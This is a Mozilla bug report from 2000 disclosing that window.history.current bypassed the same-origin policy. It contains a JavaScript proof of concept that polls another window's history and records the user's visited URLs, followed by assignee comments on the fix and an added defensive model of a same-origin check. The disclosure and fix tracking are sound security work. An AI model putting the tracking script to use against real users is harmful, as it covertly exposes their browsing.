Closed
Bug 37905
Opened 24 years ago
Closed 24 years ago
window.history.current allows tracking user's browsing
Categories
(Core :: Security, defect, P3)
Tracking
()
VERIFIED
FIXED
M16
People
(Reporter: norrisboyd, Assigned: security-bugs)
Details
(Whiteboard: [nsbeta2+])
Attachments
(1 file) 749 bytes, text/html
Subject: BUG: window.history.current allows tracking user's browsing
Date: Tue, 02 May 2000 15:45:02 +0300
From: Georgi Guninski <joro@nat.bg>
To: Norris Boyd <norris@netscape.com>

window.history.current is not protected by Same Origin security policy and that allows tracking user's surfing.
The code is:
--------------------------------------------------------------
<FORM>
<TEXTAREA WRAP=HARD NAME=comment ROWS=10 COLS=80></TEXTAREA>
</FORM>
<SCRIPT>
last="";
current="";
a=window.open("http://www.yahoo.com");
function checkStatus()
{
  current=a.history.current;
  if (current != "" && current != last)
  {
    last = current;
    document.forms[0].elements[0].value += current + " ";
  }
}
setInterval("checkStatus()",500);
</SCRIPT>
--------------------------------------------------------------

Reading links using window.history.current

window.history.current is not protected by Same Origin security policy and that allows tracking user's surfing. Follow some links in www.yahoo.com and see them in the TEXTAREA below.
Reporter
Comment 1•24 years ago
Assignee
Comment 2•24 years ago
Need to double-check call to same-origin, check default policy. I think I can take care of this one.
Assignee
Updated•24 years ago
Target Milestone: --- → M16
Assignee
Comment 6•24 years ago
Fixed...bug in nsScriptSecurityManager. Secure prefs access was failing.
Status: ASSIGNED → RESOLVED
Closed: 24 years ago
Resolution: --- → FIXED
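As an added illustration (not code from this bug or from Mozilla), here is a small JavaScript model of the kind of check discussed in comments 2 and 6: a per-property policy lookup that falls back to same-origin when the policy read fails, followed by an origin comparison before `history.current` is returned. The names `POLICY_PREFS`, `readPolicy`, `originOf`, `canAccess` and `readHistoryCurrent`, the policy values, and the sample entries are assumptions made for the example.

```javascript
// Illustrative model only. All names and values here are hypothetical and do
// not reproduce nsScriptSecurityManager or any real prefs keys.

// Constructed per-property policy table standing in for a prefs store.
const POLICY_PREFS = new Map([
  ["history.current", "sameOrigin"],
  ["example.publicProp", "allAccess"], // constructed entry, for contrast
]);

const KNOWN_POLICIES = ["allAccess", "sameOrigin", "noAccess"];

// Look up the policy for a property. A failed read, a missing key or an
// unknown value all yield "sameOrigin", so a broken prefs store fails closed.
function readPolicy(prefs, property) {
  try {
    const value = prefs.get(property);
    return KNOWN_POLICIES.includes(value) ? value : "sameOrigin";
  } catch (e) {
    return "sameOrigin";
  }
}

// Origin is scheme + host + port. Unparsable URLs and opaque origins
// (for example about:blank) return null and never match anything.
function originOf(url) {
  try {
    const origin = new URL(url).origin;
    return origin === "null" ? null : origin;
  } catch (e) {
    return null;
  }
}

// Decide whether a script loaded from subjectUrl may read `property`
// on an object belonging to the document at objectUrl.
function canAccess(prefs, property, subjectUrl, objectUrl) {
  const policy = readPolicy(prefs, property);
  if (policy === "allAccess") return true;
  if (policy === "noAccess") return false;
  const subject = originOf(subjectUrl);
  return subject !== null && subject === originOf(objectUrl);
}

// Guarded read of another window's history.current on behalf of a caller.
function readHistoryCurrent(prefs, callerUrl, targetWindow) {
  if (!canAccess(prefs, "history.current", callerUrl, targetWindow.location)) {
    throw new Error("Permission denied: cross-origin read of history.current");
  }
  return targetWindow.history.current;
}
```
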
Assignee
Comment 8•24 years ago
Opening fixed security bugs to the public.
Group: netscapeconfidential?